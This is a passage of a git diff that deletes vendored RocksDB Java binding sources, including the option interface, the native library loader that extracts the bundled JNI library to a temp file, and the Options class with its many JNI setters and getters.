-  MutableColumnFamilyOptionsInterface setLevel0FileNumCompactionTrigger(
-      int level0FileNumCompactionTrigger);
-
-  /**
-   * Number of files to trigger level-0 compaction. A value &lt; 0 means that
-   * level-0 compaction will not be triggered by number of files at all.
-   *
-   * Default: 4
-   *
-   * @return The number of files to trigger
-   */
-  int level0FileNumCompactionTrigger();
-
-  /**
-   * We try to limit number of bytes in one compaction to be lower than this
-   * threshold. But it's not guaranteed.
-   * Value 0 will be sanitized.
-   *
-   * @param maxCompactionBytes max bytes in a compaction
-   * @return the reference to the current option.
-   * @see #maxCompactionBytes()
-   */
-  MutableColumnFamilyOptionsInterface setMaxCompactionBytes(final long maxCompactionBytes);
-
-  /**
-   * We try to limit number of bytes in one compaction to be lower than this
-   * threshold. But it's not guaranteed.
-   * Value 0 will be sanitized.
-   *
-   * @return the maximum number of bytes in for a compaction.
-   * @see #setMaxCompactionBytes(long)
-   */
-  long maxCompactionBytes();
-
-  /**
-   * The upper-bound of the total size of level-1 files in bytes.
-   * Maximum number of bytes for level L can be calculated as
-   * (maxBytesForLevelBase) * (maxBytesForLevelMultiplier ^ (L-1))
-   * For example, if maxBytesForLevelBase is 20MB, and if
-   * max_bytes_for_level_multiplier is 10, total data size for level-1
-   * will be 20MB, total file size for level-2 will be 200MB,
-   * and total file size for level-3 will be 2GB.
-   * by default 'maxBytesForLevelBase' is 10MB.
-   *
-   * @param maxBytesForLevelBase maximum bytes for level base.
-   *
-   * @return the reference to the current option.
-   *
-   * See {@link AdvancedMutableColumnFamilyOptionsInterface#setMaxBytesForLevelMultiplier(double)}
-   */
-  T setMaxBytesForLevelBase(
-      long maxBytesForLevelBase);
-
-  /**
-   * The upper-bound of the total size of level-1 files in bytes.
-   * Maximum number of bytes for level L can be calculated as
-   * (maxBytesForLevelBase) * (maxBytesForLevelMultiplier ^ (L-1))
-   * For example, if maxBytesForLevelBase is 20MB, and if
-   * max_bytes_for_level_multiplier is 10, total data size for level-1
-   * will be 20MB, total file size for level-2 will be 200MB,
-   * and total file size for level-3 will be 2GB.
-   * by default 'maxBytesForLevelBase' is 10MB.
-   *
-   * @return the upper-bound of the total size of level-1 files
-   *     in bytes.
-   *
-   * See {@link AdvancedMutableColumnFamilyOptionsInterface#maxBytesForLevelMultiplier()}
-   */
-  long maxBytesForLevelBase();
-
-  /**
-   * Compress blocks using the specified compression algorithm.  This
-   * parameter can be changed dynamically.
-   *
-   * Default: SNAPPY_COMPRESSION, which gives lightweight but fast compression.
-   *
-   * @param compressionType Compression Type.
-   * @return the reference to the current option.
-   */
-  T setCompressionType(
-          CompressionType compressionType);
-
-  /**
-   * Compress blocks using the specified compression algorithm.  This
-   * parameter can be changed dynamically.
-   *
-   * Default: SNAPPY_COMPRESSION, which gives lightweight but fast compression.
-   *
-   * @return Compression type.
-   */
-  CompressionType compressionType();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java
deleted file mode 100644
index 96d364c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/NativeLibraryLoader.java
+++ /dev/null
@@ -1,124 +0,0 @@
-package org.rocksdb;
-
-import java.io.*;
-import java.nio.file.Files;
-import java.nio.file.StandardCopyOption;
-
-import org.rocksdb.util.Environment;
-
-/**
- * This class is used to load the RocksDB shared library from within the jar.
- * The shared library is extracted to a temp folder and loaded from there.
- */
-public class NativeLibraryLoader {
-  //singleton
-  private static final NativeLibraryLoader instance = new NativeLibraryLoader();
-  private static boolean initialized = false;
-
-  private static final String sharedLibraryName = Environment.getSharedLibraryName("rocksdb");
-  private static final String jniLibraryName = Environment.getJniLibraryName("rocksdb");
-  private static final String jniLibraryFileName = Environment.getJniLibraryFileName("rocksdb");
-  private static final String tempFilePrefix = "librocksdbjni";
-  private static final String tempFileSuffix = Environment.getJniLibraryExtension();
-
-  /**
-   * Get a reference to the NativeLibraryLoader
-   *
-   * @return The NativeLibraryLoader
-   */
-  public static NativeLibraryLoader getInstance() {
-    return instance;
-  }
-
-  /**
-   * Firstly attempts to load the library from <i>java.library.path</i>,
-   * if that fails then it falls back to extracting
-   * the library from the classpath
-   * {@link org.rocksdb.NativeLibraryLoader#loadLibraryFromJar(java.lang.String)}
-   *
-   * @param tmpDir A temporary directory to use
-   *   to copy the native library to when loading from the classpath.
-   *   If null, or the empty string, we rely on Java's
-   *   {@link java.io.File#createTempFile(String, String)}
-   *   function to provide a temporary location.
-   *   The temporary file will be registered for deletion
-   *   on exit.
-   *
-   * @throws java.io.IOException if a filesystem operation fails.
-   */
-  public synchronized void loadLibrary(final String tmpDir) throws IOException {
-    try {
-        System.loadLibrary(sharedLibraryName);
-    } catch(final UnsatisfiedLinkError ule1) {
-      try {
-        System.loadLibrary(jniLibraryName);
-      } catch(final UnsatisfiedLinkError ule2) {
-        loadLibraryFromJar(tmpDir);
-      }
-    }
-  }
-
-  /**
-   * Attempts to extract the native RocksDB library
-   * from the classpath and load it
-   *
-   * @param tmpDir A temporary directory to use
-   *   to copy the native library to. If null,
-   *   or the empty string, we rely on Java's
-   *   {@link java.io.File#createTempFile(String, String)}
-   *   function to provide a temporary location.
-   *   The temporary file will be registered for deletion
-   *   on exit.
-   *
-   * @throws java.io.IOException if a filesystem operation fails.
-   */
-  void loadLibraryFromJar(final String tmpDir)
-      throws IOException {
-    if (!initialized) {
-      System.load(loadLibraryFromJarToTemp(tmpDir).getAbsolutePath());
-      initialized = true;
-    }
-  }
-
-  File loadLibraryFromJarToTemp(final String tmpDir)
-          throws IOException {
-    final File temp;
-    if (tmpDir == null || tmpDir.isEmpty()) {
-      temp = File.createTempFile(tempFilePrefix, tempFileSuffix);
-    } else {
-      temp = new File(tmpDir, jniLibraryFileName);
-      if (temp.exists() && !temp.delete()) {
-        throw new RuntimeException("File: " + temp.getAbsolutePath()
-            + " already exists and cannot be removed.");
-      }
-      if (!temp.createNewFile()) {
-        throw new RuntimeException("File: " + temp.getAbsolutePath()
-            + " could not be created.");
-      }
-    }
-
-    if (!temp.exists()) {
-      throw new RuntimeException("File " + temp.getAbsolutePath() + " does not exist.");
-    } else {
-      temp.deleteOnExit();
-    }
-
-    // attempt to copy the library from the Jar file to the temp destination
-    try (final InputStream is = getClass().getClassLoader().
-      getResourceAsStream(jniLibraryFileName)) {
-      if (is == null) {
-        throw new RuntimeException(jniLibraryFileName + " was not found inside JAR.");
-      } else {
-        Files.copy(is, temp.toPath(), StandardCopyOption.REPLACE_EXISTING);
-      }
-    }
-
-    return temp;
-  }
-
-  /**
-   * Private constructor to disallow instantiation
-   */
-  private NativeLibraryLoader() {
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java
deleted file mode 100644
index dcd1138..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Options.java
+++ /dev/null
@@ -1,1864 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.ArrayList;
-import java.util.Collection;
-import java.util.Collections;
-import java.util.List;
-
-/**
- * Options to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automaticallyand native resources will be released as part of the process.
- */
-public class Options extends RocksObject
-    implements DBOptionsInterface<Options>, ColumnFamilyOptionsInterface<Options>,
-    MutableColumnFamilyOptionsInterface<Options> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct options for opening a RocksDB.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::Options} in the c++ side.
-   */
-  public Options() {
-    super(newOptions());
-    env_ = Env.getDefault();
-  }
-
-  /**
-   * Construct options for opening a RocksDB. Reusing database options
-   * and column family options.
-   *
-   * @param dbOptions {@link org.rocksdb.DBOptions} instance
-   * @param columnFamilyOptions {@link org.rocksdb.ColumnFamilyOptions}
-   *     instance
-   */
-  public Options(final DBOptions dbOptions,
-      final ColumnFamilyOptions columnFamilyOptions) {
-    super(newOptions(dbOptions.nativeHandle_,
-        columnFamilyOptions.nativeHandle_));
-    env_ = Env.getDefault();
-  }
-
-  @Override
-  public Options setIncreaseParallelism(final int totalThreads) {
-    assert(isOwningHandle());
-    setIncreaseParallelism(nativeHandle_, totalThreads);
-    return this;
-  }
-
-  @Override
-  public Options setCreateIfMissing(final boolean flag) {
-    assert(isOwningHandle());
-    setCreateIfMissing(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public Options setCreateMissingColumnFamilies(final boolean flag) {
-    assert(isOwningHandle());
-    setCreateMissingColumnFamilies(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public Options setEnv(final Env env) {
-    assert(isOwningHandle());
-    setEnv(nativeHandle_, env.nativeHandle_);
-    env_ = env;
-    return this;
-  }
-
-  @Override
-  public Env getEnv() {
-    return env_;
-  }
-
-  /**
-   * <p>Set appropriate parameters for bulk loading.
-   * The reason that this is a function that returns "this" instead of a
-   * constructor is to enable chaining of multiple similar calls in the future.
-   * </p>
-   *
-   * <p>All data will be in level 0 without any automatic compaction.
-   * It's recommended to manually call CompactRange(NULL, NULL) before reading
-   * from the database, because otherwise the read can be very slow.</p>
-   *
-   * @return the instance of the current Options.
-   */
-  public Options prepareForBulkLoad() {
-    prepareForBulkLoad(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public boolean createIfMissing() {
-    assert(isOwningHandle());
-    return createIfMissing(nativeHandle_);
-  }
-
-  @Override
-  public boolean createMissingColumnFamilies() {
-    assert(isOwningHandle());
-    return createMissingColumnFamilies(nativeHandle_);
-  }
-
-  @Override
-  public Options optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options optimizeForPointLookup(
-      long blockCacheSizeMb) {
-    optimizeForPointLookup(nativeHandle_,
-        blockCacheSizeMb);
-    return this;
-  }
-
-  @Override
-  public Options optimizeLevelStyleCompaction() {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public Options optimizeLevelStyleCompaction(
-      long memtableMemoryBudget) {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public Options optimizeUniversalStyleCompaction() {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public Options optimizeUniversalStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public Options setComparator(final BuiltinComparator builtinComparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, builtinComparator.ordinal());
-    return this;
-  }
-
-  @Override
-  public Options setComparator(
-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, comparator.getNativeHandle());
-    comparator_ = comparator;
-    return this;
-  }
-
-  @Override
-  public Options setMergeOperatorName(final String name) {
-    assert(isOwningHandle());
-    if (name == null) {
-      throw new IllegalArgumentException(
-          "Merge operator name must not be null.");
-    }
-    setMergeOperatorName(nativeHandle_, name);
-    return this;
-  }
-
-  @Override
-  public Options setMergeOperator(final MergeOperator mergeOperator) {
-    setMergeOperator(nativeHandle_, mergeOperator.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Options setWriteBufferSize(final long writeBufferSize) {
-    assert(isOwningHandle());
-    setWriteBufferSize(nativeHandle_, writeBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writeBufferSize()  {
-    assert(isOwningHandle());
-    return writeBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxWriteBufferNumber(final int maxWriteBufferNumber) {
-    assert(isOwningHandle());
-    setMaxWriteBufferNumber(nativeHandle_, maxWriteBufferNumber);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumber() {
-    assert(isOwningHandle());
-    return maxWriteBufferNumber(nativeHandle_);
-  }
-
-  @Override
-  public boolean errorIfExists() {
-    assert(isOwningHandle());
-    return errorIfExists(nativeHandle_);
-  }
-
-  @Override
-  public Options setErrorIfExists(final boolean errorIfExists) {
-    assert(isOwningHandle());
-    setErrorIfExists(nativeHandle_, errorIfExists);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidChecks() {
-    assert(isOwningHandle());
-    return paranoidChecks(nativeHandle_);
-  }
-
-  @Override
-  public Options setParanoidChecks(final boolean paranoidChecks) {
-    assert(isOwningHandle());
-    setParanoidChecks(nativeHandle_, paranoidChecks);
-    return this;
-  }
-
-  @Override
-  public int maxOpenFiles() {
-    assert(isOwningHandle());
-    return maxOpenFiles(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxFileOpeningThreads(final int maxFileOpeningThreads) {
-    assert(isOwningHandle());
-    setMaxFileOpeningThreads(nativeHandle_, maxFileOpeningThreads);
-    return this;
-  }
-
-  @Override
-  public int maxFileOpeningThreads() {
-    assert(isOwningHandle());
-    return maxFileOpeningThreads(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxTotalWalSize(final long maxTotalWalSize) {
-    assert(isOwningHandle());
-    setMaxTotalWalSize(nativeHandle_, maxTotalWalSize);
-    return this;
-  }
-
-  @Override
-  public long maxTotalWalSize() {
-    assert(isOwningHandle());
-    return maxTotalWalSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxOpenFiles(final int maxOpenFiles) {
-    assert(isOwningHandle());
-    setMaxOpenFiles(nativeHandle_, maxOpenFiles);
-    return this;
-  }
-
-  @Override
-  public boolean useFsync() {
-    assert(isOwningHandle());
-    return useFsync(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseFsync(final boolean useFsync) {
-    assert(isOwningHandle());
-    setUseFsync(nativeHandle_, useFsync);
-    return this;
-  }
-
-  @Override
-  public Options setDbPaths(final Collection<DbPath> dbPaths) {
-    assert(isOwningHandle());
-
-    final int len = dbPaths.size();
-    final String paths[] = new String[len];
-    final long targetSizes[] = new long[len];
-
-    int i = 0;
-    for(final DbPath dbPath : dbPaths) {
-      paths[i] = dbPath.path.toString();
-      targetSizes[i] = dbPath.targetSize;
-      i++;
-    }
-    setDbPaths(nativeHandle_, paths, targetSizes);
-    return this;
-  }
-
-  @Override
-  public List<DbPath> dbPaths() {
-    final int len = (int)dbPathsLen(nativeHandle_);
-    if(len == 0) {
-      return Collections.emptyList();
-    } else {
-      final String paths[] = new String[len];
-      final long targetSizes[] = new long[len];
-
-      dbPaths(nativeHandle_, paths, targetSizes);
-
-      final List<DbPath> dbPaths = new ArrayList<>();
-      for(int i = 0; i < len; i++) {
-        dbPaths.add(new DbPath(Paths.get(paths[i]), targetSizes[i]));
-      }
-      return dbPaths;
-    }
-  }
-
-  @Override
-  public String dbLogDir() {
-    assert(isOwningHandle());
-    return dbLogDir(nativeHandle_);
-  }
-
-  @Override
-  public Options setDbLogDir(final String dbLogDir) {
-    assert(isOwningHandle());
-    setDbLogDir(nativeHandle_, dbLogDir);
-    return this;
-  }
-
-  @Override
-  public String walDir() {
-    assert(isOwningHandle());
-    return walDir(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalDir(final String walDir) {
-    assert(isOwningHandle());
-    setWalDir(nativeHandle_, walDir);
-    return this;
-  }
-
-  @Override
-  public long deleteObsoleteFilesPeriodMicros() {
-    assert(isOwningHandle());
-    return deleteObsoleteFilesPeriodMicros(nativeHandle_);
-  }
-
-  @Override
-  public Options setDeleteObsoleteFilesPeriodMicros(
-      final long micros) {
-    assert(isOwningHandle());
-    setDeleteObsoleteFilesPeriodMicros(nativeHandle_, micros);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundCompactions() {
-    assert(isOwningHandle());
-    return maxBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setStatistics(final Statistics statistics) {
-    assert(isOwningHandle());
-    setStatistics(nativeHandle_, statistics.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Statistics statistics() {
-    assert(isOwningHandle());
-    final long statisticsNativeHandle = statistics(nativeHandle_);
-    if(statisticsNativeHandle == 0) {
-      return null;
-    } else {
-      return new Statistics(statisticsNativeHandle);
-    }
-  }
-
-  @Override
-  public void setBaseBackgroundCompactions(
-      final int baseBackgroundCompactions) {
-    assert(isOwningHandle());
-    setBaseBackgroundCompactions(nativeHandle_, baseBackgroundCompactions);
-  }
-
-  @Override
-  public int baseBackgroundCompactions() {
-    assert(isOwningHandle());
-    return baseBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBackgroundCompactions(
-      final int maxBackgroundCompactions) {
-    assert(isOwningHandle());
-    setMaxBackgroundCompactions(nativeHandle_, maxBackgroundCompactions);
-    return this;
-  }
-
-  @Override
-  public void setMaxSubcompactions(final int maxSubcompactions) {
-    assert(isOwningHandle());
-    setMaxSubcompactions(nativeHandle_, maxSubcompactions);
-  }
-
-  @Override
-  public int maxSubcompactions() {
-    assert(isOwningHandle());
-    return maxSubcompactions(nativeHandle_);
-  }
-
-  @Override
-  public int maxBackgroundFlushes() {
-    assert(isOwningHandle());
-    return maxBackgroundFlushes(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxBackgroundFlushes(
-      final int maxBackgroundFlushes) {
-    assert(isOwningHandle());
-    setMaxBackgroundFlushes(nativeHandle_, maxBackgroundFlushes);
-    return this;
-  }
-
-  @Override
-  public long maxLogFileSize() {
-    assert(isOwningHandle());
-    return maxLogFileSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxLogFileSize(final long maxLogFileSize) {
-    assert(isOwningHandle());
-    setMaxLogFileSize(nativeHandle_, maxLogFileSize);
-    return this;
-  }
-
-  @Override
-  public long logFileTimeToRoll() {
-    assert(isOwningHandle());
-    return logFileTimeToRoll(nativeHandle_);
-  }
-
-  @Override
-  public Options setLogFileTimeToRoll(final long logFileTimeToRoll) {
-    assert(isOwningHandle());
-    setLogFileTimeToRoll(nativeHandle_, logFileTimeToRoll);
-    return this;
-  }
-
-  @Override
-  public long keepLogFileNum() {
-    assert(isOwningHandle());
-    return keepLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public Options setKeepLogFileNum(final long keepLogFileNum) {
-    assert(isOwningHandle());
-    setKeepLogFileNum(nativeHandle_, keepLogFileNum);
-    return this;
-  }
-
-
-  @Override
-  public Options setRecycleLogFileNum(final long recycleLogFileNum) {
-    assert(isOwningHandle());
-    setRecycleLogFileNum(nativeHandle_, recycleLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long recycleLogFileNum() {
-    assert(isOwningHandle());
-    return recycleLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public long maxManifestFileSize() {
-    assert(isOwningHandle());
-    return maxManifestFileSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setMaxManifestFileSize(
-      final long maxManifestFileSize) {
-    assert(isOwningHandle());
-    setMaxManifestFileSize(nativeHandle_, maxManifestFileSize);
-    return this;
-  }
-
-  @Override
-  public Options setMaxTableFilesSizeFIFO(
-    final long maxTableFilesSize) {
-    assert(maxTableFilesSize > 0); // unsigned native type
-    assert(isOwningHandle());
-    setMaxTableFilesSizeFIFO(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  @Override
-  public long maxTableFilesSizeFIFO() {
-    return maxTableFilesSizeFIFO(nativeHandle_);
-  }
-
-  @Override
-  public int tableCacheNumshardbits() {
-    assert(isOwningHandle());
-    return tableCacheNumshardbits(nativeHandle_);
-  }
-
-  @Override
-  public Options setTableCacheNumshardbits(
-      final int tableCacheNumshardbits) {
-    assert(isOwningHandle());
-    setTableCacheNumshardbits(nativeHandle_, tableCacheNumshardbits);
-    return this;
-  }
-
-  @Override
-  public long walTtlSeconds() {
-    assert(isOwningHandle());
-    return walTtlSeconds(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalTtlSeconds(final long walTtlSeconds) {
-    assert(isOwningHandle());
-    setWalTtlSeconds(nativeHandle_, walTtlSeconds);
-    return this;
-  }
-
-  @Override
-  public long walSizeLimitMB() {
-    assert(isOwningHandle());
-    return walSizeLimitMB(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalSizeLimitMB(final long sizeLimitMB) {
-    assert(isOwningHandle());
-    setWalSizeLimitMB(nativeHandle_, sizeLimitMB);
-    return this;
-  }
-
-  @Override
-  public long manifestPreallocationSize() {
-    assert(isOwningHandle());
-    return manifestPreallocationSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setManifestPreallocationSize(final long size) {
-    assert(isOwningHandle());
-    setManifestPreallocationSize(nativeHandle_, size);
-    return this;
-  }
-
-  @Override
-  public Options setUseDirectReads(final boolean useDirectReads) {
-    assert(isOwningHandle());
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseDirectIoForFlushAndCompaction(
-      final boolean useDirectIoForFlushAndCompaction) {
-    assert(isOwningHandle());
-    setUseDirectIoForFlushAndCompaction(nativeHandle_, useDirectIoForFlushAndCompaction);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectIoForFlushAndCompaction() {
-    assert(isOwningHandle());
-    return useDirectIoForFlushAndCompaction(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowFAllocate(final boolean allowFAllocate) {
-    assert(isOwningHandle());
-    setAllowFAllocate(nativeHandle_, allowFAllocate);
-    return this;
-  }
-
-  @Override
-  public boolean allowFAllocate() {
-    assert(isOwningHandle());
-    return allowFAllocate(nativeHandle_);
-  }
-
-  @Override
-  public boolean allowMmapReads() {
-    assert(isOwningHandle());
-    return allowMmapReads(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowMmapReads(final boolean allowMmapReads) {
-    assert(isOwningHandle());
-    setAllowMmapReads(nativeHandle_, allowMmapReads);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapWrites() {
-    assert(isOwningHandle());
-    return allowMmapWrites(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowMmapWrites(final boolean allowMmapWrites) {
-    assert(isOwningHandle());
-    setAllowMmapWrites(nativeHandle_, allowMmapWrites);
-    return this;
-  }
-
-  @Override
-  public boolean isFdCloseOnExec() {
-    assert(isOwningHandle());
-    return isFdCloseOnExec(nativeHandle_);
-  }
-
-  @Override
-  public Options setIsFdCloseOnExec(final boolean isFdCloseOnExec) {
-    assert(isOwningHandle());
-    setIsFdCloseOnExec(nativeHandle_, isFdCloseOnExec);
-    return this;
-  }
-
-  @Override
-  public int statsDumpPeriodSec() {
-    assert(isOwningHandle());
-    return statsDumpPeriodSec(nativeHandle_);
-  }
-
-  @Override
-  public Options setStatsDumpPeriodSec(final int statsDumpPeriodSec) {
-    assert(isOwningHandle());
-    setStatsDumpPeriodSec(nativeHandle_, statsDumpPeriodSec);
-    return this;
-  }
-
-  @Override
-  public boolean adviseRandomOnOpen() {
-    return adviseRandomOnOpen(nativeHandle_);
-  }
-
-  @Override
-  public Options setAdviseRandomOnOpen(final boolean adviseRandomOnOpen) {
-    assert(isOwningHandle());
-    setAdviseRandomOnOpen(nativeHandle_, adviseRandomOnOpen);
-    return this;
-  }
-
-  @Override
-  public Options setDbWriteBufferSize(final long dbWriteBufferSize) {
-    assert(isOwningHandle());
-    setDbWriteBufferSize(nativeHandle_, dbWriteBufferSize);
-    return this;
-  }
-
-  @Override
-  public long dbWriteBufferSize() {
-    assert(isOwningHandle());
-    return dbWriteBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setAccessHintOnCompactionStart(final AccessHint accessHint) {
-    assert(isOwningHandle());
-    setAccessHintOnCompactionStart(nativeHandle_, accessHint.getValue());
-    return this;
-  }
-
-  @Override
-  public AccessHint accessHintOnCompactionStart() {
-    assert(isOwningHandle());
-    return AccessHint.getAccessHint(accessHintOnCompactionStart(nativeHandle_));
-  }
-
-  @Override
-  public Options setNewTableReaderForCompactionInputs(
-      final boolean newTableReaderForCompactionInputs) {
-    assert(isOwningHandle());
-    setNewTableReaderForCompactionInputs(nativeHandle_,
-        newTableReaderForCompactionInputs);
-    return this;
-  }
-
-  @Override
-  public boolean newTableReaderForCompactionInputs() {
-    assert(isOwningHandle());
-    return newTableReaderForCompactionInputs(nativeHandle_);
-  }
-
-  @Override
-  public Options setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    assert(isOwningHandle());
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
-  @Override
-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    assert(isOwningHandle());
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public Options setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    assert(isOwningHandle());
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  @Override
-  public Options setUseAdaptiveMutex(final boolean useAdaptiveMutex) {
-    assert(isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  @Override
-  public long bytesPerSync() {
-    return bytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public Options setBytesPerSync(final long bytesPerSync) {
-    assert(isOwningHandle());
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  @Override
-  public Options setWalBytesPerSync(final long walBytesPerSync) {
-    assert(isOwningHandle());
-    setWalBytesPerSync(nativeHandle_, walBytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long walBytesPerSync() {
-    assert(isOwningHandle());
-    return walBytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public Options setEnableThreadTracking(final boolean enableThreadTracking) {
-    assert(isOwningHandle());
-    setEnableThreadTracking(nativeHandle_, enableThreadTracking);
-    return this;
-  }
-
-  @Override
-  public boolean enableThreadTracking() {
-    assert(isOwningHandle());
-    return enableThreadTracking(nativeHandle_);
-  }
-
-  @Override
-  public Options setDelayedWriteRate(final long delayedWriteRate) {
-    assert(isOwningHandle());
-    setDelayedWriteRate(nativeHandle_, delayedWriteRate);
-    return this;
-  }
-
-  @Override
-  public long delayedWriteRate(){
-    return delayedWriteRate(nativeHandle_);
-  }
-
-  @Override
-  public Options setAllowConcurrentMemtableWrite(
-      final boolean allowConcurrentMemtableWrite) {
-    setAllowConcurrentMemtableWrite(nativeHandle_,
-        allowConcurrentMemtableWrite);
-    return this;
-  }
-
-  @Override
-  public boolean allowConcurrentMemtableWrite() {
-    return allowConcurrentMemtableWrite(nativeHandle_);
-  }
-
-  @Override
-  public Options setEnableWriteThreadAdaptiveYield(
-      final boolean enableWriteThreadAdaptiveYield) {
-    setEnableWriteThreadAdaptiveYield(nativeHandle_,
-        enableWriteThreadAdaptiveYield);
-    return this;
-  }
-
-  @Override
-  public boolean enableWriteThreadAdaptiveYield() {
-    return enableWriteThreadAdaptiveYield(nativeHandle_);
-  }
-
-  @Override
-  public Options setWriteThreadMaxYieldUsec(final long writeThreadMaxYieldUsec) {
-    setWriteThreadMaxYieldUsec(nativeHandle_, writeThreadMaxYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadMaxYieldUsec() {
-    return writeThreadMaxYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public Options setWriteThreadSlowYieldUsec(final long writeThreadSlowYieldUsec) {
-    setWriteThreadSlowYieldUsec(nativeHandle_, writeThreadSlowYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadSlowYieldUsec() {
-    return writeThreadSlowYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public Options setSkipStatsUpdateOnDbOpen(final boolean skipStatsUpdateOnDbOpen) {
-    assert(isOwningHandle());
-    setSkipStatsUpdateOnDbOpen(nativeHandle_, skipStatsUpdateOnDbOpen);
-    return this;
-  }
-
-  @Override
-  public boolean skipStatsUpdateOnDbOpen() {
-    assert(isOwningHandle());
-    return skipStatsUpdateOnDbOpen(nativeHandle_);
-  }
-
-  @Override
-  public Options setWalRecoveryMode(final WALRecoveryMode walRecoveryMode) {
-    assert(isOwningHandle());
-    setWalRecoveryMode(nativeHandle_, walRecoveryMode.getValue());
-    return this;
-  }
-
-  @Override
-  public WALRecoveryMode walRecoveryMode() {
-    assert(isOwningHandle());
-    return WALRecoveryMode.getWALRecoveryMode(walRecoveryMode(nativeHandle_));
-  }
-
-  @Override
-  public Options setAllow2pc(final boolean allow2pc) {
-    assert(isOwningHandle());
-    setAllow2pc(nativeHandle_, allow2pc);
-    return this;
-  }
-
-  @Override
-  public boolean allow2pc() {
-    assert(isOwningHandle());
